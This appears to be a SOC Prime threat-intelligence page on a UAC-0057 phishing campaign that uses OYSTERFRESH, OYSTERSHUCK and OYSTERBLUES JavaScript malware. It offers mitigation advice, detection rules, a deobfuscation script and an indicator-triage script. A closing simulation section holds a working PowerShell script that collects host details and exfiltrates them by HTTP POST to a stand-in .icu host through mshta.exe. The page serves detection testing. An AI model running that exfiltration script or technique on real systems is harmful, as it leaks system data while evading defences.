SOC Prime Bias: Medium

22 May 2026 12:56 UTC

UAC-0057 Updates Its Toolkit with OYSTERFRESH, OYSTERSHUCK, and OYSTERBLUES

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

CERT-UA has reported a phishing campaign aimed at Ukrainian government organizations. The emails contain PDF attachments that redirect recipients to ZIP archives carrying malicious JavaScript files known as OYSTERFRESH, OYSTERSHUCK, and OYSTERBLUES. Once executed, the malware gathers system information and sends it out through HTTP POST requests, with the option to retrieve a Cobalt Strike component at a later stage. The supporting infrastructure is concealed behind Cloudflare and makes extensive use of .icu domains.

Investigation

CERT-UA’s analysis identified the malicious JavaScript samples, the decoding methods they rely on, including string reversal, ROT13, and URL decoding, and the registry changes used to maintain persistence. Investigators also documented multiple file artifacts and Windows paths associated with the infection chain. Network analysis linked the activity to Cloudflare-protected .icu hosting infrastructure. The report further notes the possible follow-on delivery of a Cobalt Strike beacon.
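The decoding layers named above (string reversal, ROT13 and URL decoding) are all reversible and can be peeled mechanically. The following Python is an added example written for this page, not CERT-UA's or SOC Prime's tooling: it wraps a constructed, harmless script line in the three transforms and then recovers it by a breadth-first search over transform sequences, so the analyst does not need to know the layering order in advance. The order used to build the sample and the keyword heuristic for recognising decoded script are assumptions made for the example.

```python
import codecs
from collections import deque
from urllib.parse import quote, unquote

# The three reversible transforms the CERT-UA analysis names. The order in
# which a real sample applies them is not known in advance, so the peeler
# searches over sequences of them instead of assuming one.
TRANSFORMS = {
    "reverse": lambda s: s[::-1],
    "rot13": lambda s: codecs.decode(s, "rot_13"),
    "urldecode": unquote,
}

# Heuristic for "this now looks like script": a script-host keyword plus the
# punctuation a JavaScript statement needs. This is an assumption for the
# example; a production triage script would use a richer scorer.
KEYWORDS = ("wscript", "activexobject", "eval(")


def looks_decoded(text: str) -> bool:
    lowered = text.lower()
    return any(k in lowered for k in KEYWORDS) and all(ch in text for ch in "();")


def peel(blob: str, max_depth: int = 5):
    """Breadth-first search over transform sequences.

    Returns (plaintext, path) for the shortest sequence whose output passes
    looks_decoded(), or (None, []) if nothing within max_depth qualifies.
    """
    queue = deque([(blob, ())])
    seen = {blob}
    while queue:
        text, path = queue.popleft()
        if looks_decoded(text):
            return text, list(path)
        if len(path) >= max_depth:
            continue
        for name, fn in TRANSFORMS.items():
            try:
                nxt = fn(text)
            except (UnicodeError, ValueError):
                continue
            if nxt == text or nxt in seen:  # no-op transform or already explored
                continue
            seen.add(nxt)
            queue.append((nxt, path + (name,)))
    return None, []


# Constructed sample: a harmless script line wrapped as URL-encode -> ROT13 ->
# reverse. That layering is assumed for the example, not taken from the samples.
SAMPLE_PLAINTEXT = 'WScript.Echo("system info collected");'


def build_sample(plaintext: str = SAMPLE_PLAINTEXT) -> str:
    return codecs.encode(quote(plaintext, safe=""), "rot_13")[::-1]


if __name__ == "__main__":
    decoded, path = peel(build_sample())
    print(" -> ".join(path))
    print(decoded)
```

Because ROT13 and reversal commute, several sequences reach the same intermediate strings; the `seen` set prunes those so the search stays small even at depth five.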

Mitigation

Organizations should restrict wscript.exe execution for standard users, limit both PowerShell and JavaScript execution, and monitor the listed registry Run keys for suspicious changes. Web filtering should be used to block .icu domains and, where appropriate, Cloudflare-related IP ranges associated with the campaign. Defenders should also apply least-privilege controls and prevent automatic execution of unknown binaries.

Response

Security teams should create detections for the identified filenames, registry keys, and outbound HTTP POST traffic to the known domains. Hunting should also cover the possible Cobalt Strike payload, including the CSBEACON DLL, and any scheduled task named MicrosoftEdgeUpdateTaskMachine. Endpoint investigations should collect process trees to trace the JavaScript decoding and execution chain.
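To make the detection points in the Mitigation and Response sections concrete, here is an added Python example (not SOC Prime's rule logic or the platform's query language) that applies the listed indicators as simple checks over constructed registry, process, network and scheduled-task events. The event field names, the archive-tool parent images and the rule labels are assumptions for the example; the binary names, task name, script host and .icu TLD come from the report text above.

```python
import re
from urllib.parse import urlparse

# Indicators taken from the report: Run-key persistence, Windows Script Host
# launching a script file, HTTP POST to a .icu host, and the named task.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf|hta)(?=[\s'\"]|$)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
ARCHIVE_TOOLS = {"7zfm.exe", "7zg.exe", "winrar.exe"}       # assumed parent images
SUSPICIOUS_TLDS = {"icu"}
LURE_BINARIES = {"microsoftedgeupdate.exe", "edgeapp.exe"}  # names from the report
LURE_TASK = "microsoftedgeupdatetaskmachine"                # task name from the report


def _basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").rsplit("\\", 1)[-1].lower()


def check_registry(ev: dict) -> list:
    """Run-key value that points at a script file or at one of the lure binaries."""
    hits = []
    if not RUN_KEY_RE.search(ev.get("key", "")):
        return hits
    value = ev.get("value", "")
    if SCRIPT_EXT_RE.search(value):
        hits.append("run_key_script_extension")
    if any(name in value.lower() for name in LURE_BINARIES):
        hits.append("run_key_lure_binary")
    return hits


def check_process(ev: dict) -> list:
    """Script host given a script file, and/or a parent that is an archive tool."""
    hits = []
    if _basename(ev.get("image", "")) in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(ev.get("cmdline", "")):
        hits.append("script_host_running_script")
    if _basename(ev.get("parent", "")) in ARCHIVE_TOOLS:
        hits.append("launched_from_archive_tool")
    return hits


def check_network(ev: dict) -> list:
    """HTTP POST to a host under one of the suspicious top-level domains."""
    host = urlparse(ev.get("url", "")).hostname or ""
    tld = host.rsplit(".", 1)[-1].lower()
    if ev.get("method", "").upper() == "POST" and tld in SUSPICIOUS_TLDS:
        return ["post_to_suspicious_tld"]
    return []


def check_task(ev: dict) -> list:
    return ["lure_task_name"] if ev.get("name", "").lower() == LURE_TASK else []


CHECKS = {"registry": check_registry, "process": check_process,
          "network": check_network, "task": check_task}


def triage(ev: dict) -> list:
    return CHECKS.get(ev.get("type"), lambda _ev: [])(ev)


def summarize(events) -> list:
    return [triage(ev) for ev in events]


# Constructed sample telemetry for the example; none of these are real campaign artifacts.
SAMPLE_EVENTS = [
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdate",
     "value": r'wscript.exe //B "C:\Users\u\AppData\Roaming\MicrosoftEdgeUpdate.js"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\EdgeApp",
     "value": r'"C:\Users\u\AppData\Roaming\EdgeApp.exe"'},
    {"type": "process", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\7zO4A1\document.js"',
     "parent": r"C:\Program Files\7-Zip\7zFM.exe"},
    {"type": "network", "method": "POST", "url": "http://constructed-c2.icu/collect"},
    {"type": "task", "name": "MicrosoftEdgeUpdateTaskMachine"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vendor",
     "value": r'"C:\Program Files\Vendor\updater.exe"'},
    {"type": "network", "method": "POST", "url": "https://api.example.com/v1/ping"},
]

if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, summarize(SAMPLE_EVENTS)):
        print(ev["type"], hits)
```

Each check returns labels rather than a boolean so one event can satisfy several rules at once (the wscript.exe launch from an archive tool above triggers two), which is the shape a SIEM correlation step usually wants.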

Attack Flow

    graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef malware fill:#ff9999
    classDef tool fill:#cccccc
    classDef process fill:#ffcc99
    %% Node definitions
    action_phishing["<b>Action</b> – <b>T1566.001 Phishing</b><br/>Spearphishing Attachment: Send email with malicious PDF containing link to ZIP"]
    class action_phishing action
    action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b><br/>Victim opens PDF/ZIP and runs JavaScript OYSTERFRESH"]
    class action_user_exec action
    malware_oysterfresh["<b>Malware</b> – OYSTERFRESH<br/>JavaScript file delivered in ZIP, entry point of the attack"]
    class malware_oysterfresh malware
    action_obfuscate["<b>Action</b> – <b>T1027.008 Obfuscation</b><br/>Payload obfuscated via string reversal, ROT13 and URL-decoding"]
    class action_obfuscate action
    malware_oysterblues["<b>Malware</b> – OYSTERBLUES<br/>Writes registry entries and launches persistence components"]
    class malware_oysterblues malware
    tool_wscript["<b>Tool</b> – wscript.exe<br/>Windows Script Host used to run additional JavaScript components"]
    class tool_wscript tool
    action_proxy_exec["<b>Action</b> – <b>T1127 Proxy Execution</b><br/>Uses wscript.exe to execute OYSTERSHUCK and OYSTERBLUES"]
    class action_proxy_exec action
    action_persistence["<b>Action</b> – <b>T1547.014 Persistence</b><br/>Creates HKCU Run keys to launch MicrosoftEdgeUpdate.exe and EdgeApp.exe at logon"]
    class action_persistence action
    action_discovery["<b>Action</b> – <b>T1057 Process Discovery</b><br/>Collects process list, computer name, user account, OS version and boot time"]
    class action_discovery action
    process_c2["<b>Process</b> – HTTP POST to C2 server<br/>Sends discovered system information"]
    class process_c2 process
    action_embedded_payload["<b>Action</b> – <b>T1027.009 Embedded Payload</b><br/>Cobalt Strike beacon embedded in JavaScript and executed via eval"]
    class action_embedded_payload action
    malware_cobalt_strike["<b>Malware</b> – Cobalt Strike beacon<br/>Embedded malicious payload"]
    class malware_cobalt_strike malware
    %% Connections
    action_phishing -->|delivers| action_user_exec
    action_user_exec -->|triggers| malware_oysterfresh
    malware_oysterfresh -->|performs| action_obfuscate
    action_obfuscate -->|creates| malware_oysterblues
    malware_oysterblues -->|uses| tool_wscript
    tool_wscript -->|enables| action_proxy_exec
    action_proxy_exec -->|executes| malware_oysterblues
    action_proxy_exec -->|executes| malware_oysterfresh
    action_proxy_exec -->|executes| malware_cobalt_strike
    action_persistence -->|establishes| process_c2
    action_discovery -->|gathers data and| process_c2
    action_embedded_payload -->|executes| malware_cobalt_strike

Detections

Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)

SOC Prime Team
22 May 2026

Suspicious File Extension Added to Run Keys [ASEPs] (via registry_event)

SOC Prime Team
22 May 2026

Archive Extraction Directly from Mail Client (via process_creation)

SOC Prime Team
22 May 2026

Execution from ZIP Archive [7zip] (via process_creation)

SOC Prime Team
22 May 2026

Execution from RAR Archive [WinRAR] (via process_creation)

SOC Prime Team
22 May 2026

LOLBAS WScript / CScript (via process_creation)

SOC Prime Team
22 May 2026

LOLBAS RunDLL32 (via cmdline)

SOC Prime Team
22 May 2026

Suspicious Extracted Files from an Archive (via file_event)

SOC Prime Team
22 May 2026

Suspicious Scheduled Task (via audit)

SOC Prime Team
22 May 2026

Suspicious Command and Control by Unusual Top Level Domain (TLD) DNS Request (via dns)

SOC Prime Team
22 May 2026

IOCs (HashSha256) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES Part 2

SOC Prime AI Rules
22 May 2026

IOCs (HashSha256) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES Part 1

SOC Prime AI Rules
22 May 2026

IOCs (HashSha1) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES

SOC Prime AI Rules
22 May 2026

IOCs (HashMd5) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES Part 2

SOC Prime AI Rules
22 May 2026

IOCs (HashMd5) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES Part 1

SOC Prime AI Rules
22 May 2026

IOCs (SourceIP) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES

SOC Prime AI Rules
22 May 2026

IOCs (DestinationIP) to detect: Updated toolkit UAC-0057: OYSTERFRESH, OYSTERSHUCK and OYSTERBLUES

SOC Prime AI Rules
22 May 2026

Detection of OYSTERBLUES Exfiltration via HTTP POST to .icu Domains [Windows Network Connection]

SOC Prime AI Rules
22 May 2026

Detection of Malicious JavaScript Execution via wscript.exe [Windows Process Creation]

SOC Prime AI Rules
22 May 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative directly reflect the TTPs identified and produce the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    The adversary leverages a signed Windows binary (mshta.exe) to run a small JavaScript payload that collects system information and exfiltrates it via an HTTP POST to a malicious “*.icu” domain controlled by the C2 server. This “living‑off‑the‑land” approach avoids raising AV alerts while generating the exact firewall event the rule monitors (POST + “.icu”).

  • Regression Test Script:

    # OYSTERBLUES-style exfiltration simulation
    # 1. Encode minimal system info in JSON
    $info = @{
        hostname = $env:COMPUTERNAME
        user     = $env:USERNAME
        os       = (Get-CimInstance -ClassName Win32_OperatingSystem).Caption
    } | ConvertTo-Json -Compress

    # 2. Write a temporary HTML file that issues a JS POST. mshta.exe runs script
    #    in the legacy IE engine, which has no fetch(), so XMLHttpRequest is used;
    #    the window closes itself once the request has completed.
    $htmlPath = Join-Path $env:TEMP "exfil.html"
    $js = @(
        "var data = '$info';",
        "var xhr = new XMLHttpRequest();",
        "xhr.open('POST', 'http://malicious-c2.abc.icu/collect', true);",
        "xhr.setRequestHeader('Content-Type', 'application/json');",
        "xhr.onreadystatechange = function () { if (xhr.readyState === 4) { window.close(); } };",
        "xhr.send(data);"
    ) -join "`n"
    Set-Content -Path $htmlPath -Value "<script>$js</script>" -Encoding ASCII

    # 3. Execute via mshta (signed binary proxy execution)
    Start-Process -FilePath (Join-Path $env:SystemRoot "System32\mshta.exe") -ArgumentList "`"$htmlPath`""

    # 4. Give the request time to complete, then clean up
    Start-Sleep -Seconds 5
    Remove-Item -Path $htmlPath -Force -ErrorAction SilentlyContinue

  • Cleanup Commands:

    # Ensure any lingering mshta processes are terminated
    Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force

    # Remove residual temporary files (if any)
    $tempFiles = Get-ChildItem -Path $env:TEMP -Filter "exfil.html" -ErrorAction SilentlyContinue
    foreach ($file in $tempFiles) { Remove-Item $file.FullName -Force }